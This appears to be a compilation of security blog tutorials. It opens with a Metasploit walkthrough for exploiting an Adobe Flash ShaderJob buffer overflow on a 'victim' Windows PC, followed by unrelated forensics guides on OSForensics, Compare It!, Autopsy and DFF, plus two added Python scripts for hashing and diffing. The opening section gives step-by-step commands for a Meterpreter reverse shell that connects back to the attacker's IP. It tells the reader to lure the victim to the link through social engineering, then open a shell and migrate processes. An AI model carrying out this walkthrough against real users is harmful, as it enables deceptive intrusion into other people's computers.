Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow

This module exploits a buffer overflow vulnerability in the ShaderJob implementation of Adobe Flash Player. The bug is triggered when a Shader is applied with the same Bitmap object set as both the source and the destination of the ShaderJob. By modifying the "width" attribute of the ShaderJob after the job has been started, it is possible to create a buffer overflow in which both the size of the destination buffer and the length of the copy are attacker-controlled. The module has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169
Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169
Linux Mint "Rebecca" (32-bit), Firefox 33.0 and Adobe Flash 11.2.202.457

Exploit Targets
Windows 7
Firefox 38.0.5
Adobe Flash 17.0.0.169

Requirements
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/multi/browser/adobe_flash_shader_job_overflow (the module lives under multi/browser because it also targets Linux)
msf exploit(adobe_flash_shader_job_overflow) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_shader_job_overflow) > set lhost 192.168.0.160 (IP of the attacker's machine, where the Meterpreter session connects back)
msf exploit(adobe_flash_shader_job_overflow) > set srvhost 192.168.0.160
msf exploit(adobe_flash_shader_job_overflow) > set uripath /
msf exploit(adobe_flash_shader_job_overflow) > exploit


The module now serves the exploit at http://192.168.0.160:8080/; this is the URL you give to your victim.


Send the link to the victim via chat, email or any other social engineering technique.
When the victim opens the link (http://192.168.0.160:8080) in a vulnerable browser, a Meterpreter session will be opened as shown below.


Now type sessions -l to list the sessions opened when the victim followed the link.

Once a session is open, type sysinfo to get system information, then type shell to drop into the victim's command prompt. Note that a session from a browser exploit runs inside the browser or plugin process and dies when the victim closes the tab, so migrate to another process before doing anything lengthy.

Forensics Investigation of Deleted Files in a Drive

First of all, download OSForensics from here.


Select the Create Signature option and click on Config.


Now browse to the desired directory from Directory list management; in my case I am selecting Desktop.

Click on Add to list to include the directory, then click OK.


The Start folder field now shows the selected directory, i.e. c:\users\raj\desktop. Click on Start.


It will ask for a file name; enter one and click on Save. A signature of the directory is now created.



Now make some modifications in the directory (create, edit and delete a few files) and repeat the same steps to create a second signature after the modifications.


Now click on the Compare Signature option.


Browse to both files, i.e. the old signature and the new signature.


Click on Compare to start the process. It will show the files with their status (new, modified or deleted) as well as their creation and modification dates. Use the Show option to list only modified or deleted files.


Now only deleted or modified files are shown, with their creation and deletion dates.
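The signature-and-compare workflow above is a directory snapshot with file hashes, compared against a later snapshot of the same directory. The following Python script, added here as an illustration (it is not part of OSForensics and not from the original article), implements the same idea: it records size, modification time and SHA-256 for every file under a directory, saves the snapshot as JSON, and reports created, deleted and modified files between two snapshots. It goes one step beyond the text by showing why the comparison keys on the hash rather than the timestamp: a file whose mtime is changed but whose content is not is reported as touched, not modified. The directory layout, file names and contents are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile
import time
from pathlib import Path


def sha256_file(path, chunk_size=1 << 16):
    """Hash a file in chunks so large evidence files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def create_signature(root):
    """Snapshot every regular file under root: size, mtime and SHA-256, keyed by relative path."""
    root = Path(root)
    signature = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if not path.is_file():  # skip sockets, broken symlinks and the like
                continue
            stat = path.stat()
            signature[path.relative_to(root).as_posix()] = {
                "size": stat.st_size,
                "mtime": stat.st_mtime,
                "sha256": sha256_file(path),
            }
    return signature


def save_signature(signature, out_path):
    """Persist a snapshot; keep the signature file outside the directory being signed."""
    with open(out_path, "w") as fh:
        json.dump(signature, fh, indent=2, sort_keys=True)


def load_signature(path):
    with open(path) as fh:
        return json.load(fh)


def compare_signatures(old, new):
    """Classify paths as created, deleted, modified or merely touched.

    A file counts as modified only when its content hash differs. A changed
    timestamp alone is not evidence of a content change (and timestamps are
    trivially forged), so it is reported separately as touched.
    """
    old_paths, new_paths = set(old), set(new)
    common = old_paths & new_paths
    return {
        "created": sorted(new_paths - old_paths),
        "deleted": sorted(old_paths - new_paths),
        "modified": sorted(p for p in common if old[p]["sha256"] != new[p]["sha256"]),
        "touched": sorted(p for p in common
                          if old[p]["sha256"] == new[p]["sha256"]
                          and old[p]["mtime"] != new[p]["mtime"]),
    }


def demo():
    """Constructed walkthrough: sign a directory, change it, sign again, compare."""
    with tempfile.TemporaryDirectory() as tmp:
        data = Path(tmp) / "desktop"      # stands in for c:\users\raj\desktop
        sigs = Path(tmp) / "signatures"   # signature files live outside the signed tree
        data.mkdir()
        sigs.mkdir()
        (data / "keep.txt").write_text("unchanged content\n")
        (data / "notes.txt").write_text("first draft\n")
        (data / "secret.txt").write_text("to be deleted\n")

        save_signature(create_signature(data), sigs / "old.json")

        (data / "notes.txt").write_text("edited draft\n")  # modified
        (data / "secret.txt").unlink()                       # deleted
        (data / "new.txt").write_text("added later\n")       # created
        past = time.time() - 3600
        os.utime(data / "keep.txt", (past, past))            # mtime changed, content not

        save_signature(create_signature(data), sigs / "new.json")
        return compare_signatures(load_signature(sigs / "old.json"),
                                  load_signature(sigs / "new.json"))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it as a script to see the four lists; on a real case, call create_signature on the evidence directory before and after the suspected activity and keep the JSON files with the case notes, since the hashes in them are what make the comparison defensible.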


Comparison of two Files for forensics investigation by Compare IT

Compare It! displays two files side by side, with differing sections coloured to simplify analysis. You can move changes between files with a single mouse click or keystroke, and you can edit files directly in the comparison window. It can print a coloured differences report exactly as it appears on screen. It supports regular expressions, so you can easily strip XML tags from a file to compare XML with XML or XML with text. It runs on all Windows variants and can compare, merge and save text files from DOS, Windows, UNIX and Mac systems, and it can create an HTML report of the results.
Compare It! also supports an auto-backup folder with old file versions, so you can always revert a file after an inaccurate merge.

First of all, install Compare It! from the link given below.

http://www.grigsoft.com/wincmp3.htm

Open the Compare It! tool; it will show a window to select the files to be compared.

Select the first file and click Open, then select the second file and click Open.



The differences between the two files are now highlighted.


Click on View and select Next Change to jump to the next difference.


Click on View and select Changes only to show all the changes at once, with unchanged lines hidden.


Click on Merge and select Separate; this separates the changed lines.


Select the Edit checkbox in the status bar; the cursor moves to the changed line and the text can now be edited.
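The Changes only view above is a line-by-line diff with the equal regions suppressed. The following Python function, added here as an illustration and not taken from Compare It! or the original article, produces the same kind of listing with the standard library's difflib: every differing region is reported with its old and new starting line numbers and the lines removed and added. The two sample texts are a constructed before/after pair of an sshd configuration, chosen because a config diff is where a changed security setting (here root login and an extra allowed user) stands out.

```python
import difflib


def changes_only(old_text, new_text):
    """Return only the differing regions between two texts.

    Each entry is (tag, old_line_no, new_line_no, removed_lines, added_lines),
    with 1-based line numbers as in a side-by-side viewer; 'equal' regions are
    dropped, which is exactly what a "changes only" view does.
    """
    old_lines = old_text.splitlines()
    new_lines = new_text.splitlines()
    matcher = difflib.SequenceMatcher(a=old_lines, b=new_lines, autojunk=False)
    changes = []
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "equal":
            continue
        changes.append((tag, i1 + 1, j1 + 1, old_lines[i1:i2], new_lines[j1:j2]))
    return changes


def render(changes):
    """Plain-text rendering: one header per changed region, '-' removed, '+' added."""
    out = []
    for tag, old_no, new_no, removed, added in changes:
        out.append(f"@@ {tag}: old line {old_no}, new line {new_no}")
        out.extend("- " + line for line in removed)
        out.extend("+ " + line for line in added)
    return "\n".join(out)


# Constructed sample: an sshd_config before and after an unauthorised edit.
OLD_CONFIG = """Port 22
PermitRootLogin no
PasswordAuthentication no
AllowUsers raj
"""

NEW_CONFIG = """Port 22
PermitRootLogin yes
PasswordAuthentication no
AllowUsers raj backdoor
MaxAuthTries 10
"""

if __name__ == "__main__":
    print(render(changes_only(OLD_CONFIG, NEW_CONFIG)))
```

For real files, read both with errors="replace" so a stray non-UTF-8 byte in an evidence file does not abort the comparison, and hash both files first: if the hashes match there is nothing to diff.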

Live Case Investigation using Autopsy

First download Autopsy from here and install it on your PC.

Click ‘Create a New Case’ option.


A new page will open. Enter the Case Name and the Base Directory, i.e. the location where the case will be saved, e.g. c:\users\raj\desktop\auto. Then click Next to proceed to the next step.


In the next step enter the case number and the examiner details, then click Finish.


A new window will open asking you to add a data source (Step 1). Select the source type, browse to the file path and click Next.


In Step 2, Configure Ingest Modules, I have chosen all the modules as I want complete information on the evidence device, disk or system. Click Next to proceed.


In Add Data Source just click Finish. Autopsy will process the data source and add it to the local case database, after which you can investigate the victim's device, system or disk.


After processing completes, the results are shown in the case tree. Click on Devices Attached to list the devices that have been attached to the system.


Now click on EXIF Metadata (Exchangeable Image File Format, the metadata embedded in images and sound files by digital cameras, smartphones and scanners). It will list the image files that carry such metadata.


Now click on Installed Programs to see all the programs installed on the system.


Click Operating System Information to see the details of the installed operating system(s).


Now select the Operating System User Account option. It will display the names of all the user accounts.


Now click on the Recent Documents option to display the most recently created or opened documents.


Click the Web Bookmarks option to see the bookmarks saved by the system's users in the different browsers.


To see web cookies, select the Web Cookies option.


To see web downloads, click on the Web Downloads option.


To check the browsing history, click on the Web History option.


To see the history of internet searches, click on the Web Search option.


To see the list of all email addresses found on the system, click on Email Addresses.

How to Install Digital Forensics Framework in System

DFF (Digital Forensics Framework) is free and open-source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used by professionals and non-experts alike to quickly and easily collect, preserve and reveal digital evidence without compromising systems and data.

To install DFF (Digital Forensics Framework), first install Python from the link given below.

Python from Here.


Install PyQt4 from here. Both are prerequisites for DFF.


Now click on I Agree.


Select the type of install and click on Next.


Choose the Python installation folder and click on Install.


Now install DFF from here and click on Next.


Click on I Agree to proceed Further.


Now choose the destination folder in which to install DFF and click on Next.


Now choose the Start Menu folder and click on Install.


Click on Finish to complete the installation.